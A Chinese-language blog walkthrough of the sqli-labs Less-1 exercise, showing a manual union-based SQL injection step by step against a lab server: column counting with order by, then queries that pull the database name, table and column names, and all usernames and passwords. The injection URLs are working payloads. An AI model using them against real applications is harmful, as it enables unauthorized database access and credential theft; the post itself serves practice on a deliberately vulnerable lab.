手动SQL注入(二)
本文最后更新于 609 天前,其中的信息可能已经有所发展或是发生改变。

实验环境来自sqli-labs

sql1 1024x564.png-


首先输入个’测试下

image 1024x564.png-1


发现报错,可能有SQL注入,order by看看回显几个字段

http://192.168.1.109:8888/Less-1/?id=1' order by 1# 
image 1 1024x564.png-2


发现还是报错,把#编码一下试试,#的URL编码为%23

image 2 1024x564.png-3


不报错了

image 3 1024x564.png-4
image 4 1024x564.png-5




测试到4的时候发现报错了,那么字段数就是3

先测试一下回显的字段在哪

http://192.168.1.109:8888/Less-1/?id=-1' union select 1,2,3%23 
image 5 1024x564.png-6


接着可以注入数据库了

http://192.168.1.109:8888/Less-1/?id=-1' union select 1,2,database()%23 
image 6 1024x564.png-7


数据库名为security

查找表名

http://192.168.1.109:8888/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23 
image 7 1024x564.png-8


查找字段名

http://192.168.1.109:8888/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23 
image 8 1024x564.png-9


查找用户名密码

http://192.168.1.109:8888/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users%23 
image 9 1024x564.png-10


评论

  1. Avatar photo
    博主
    3 年前
    2021-7-03 22:38:53

    test ::

  2. Avatar photo
    博主
    2 年前
    2022-7-02 17:42:39

    test2 ::

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
贴吧
颜文字
Emoji
小恐龙
花!
贴吧
上一篇
下一篇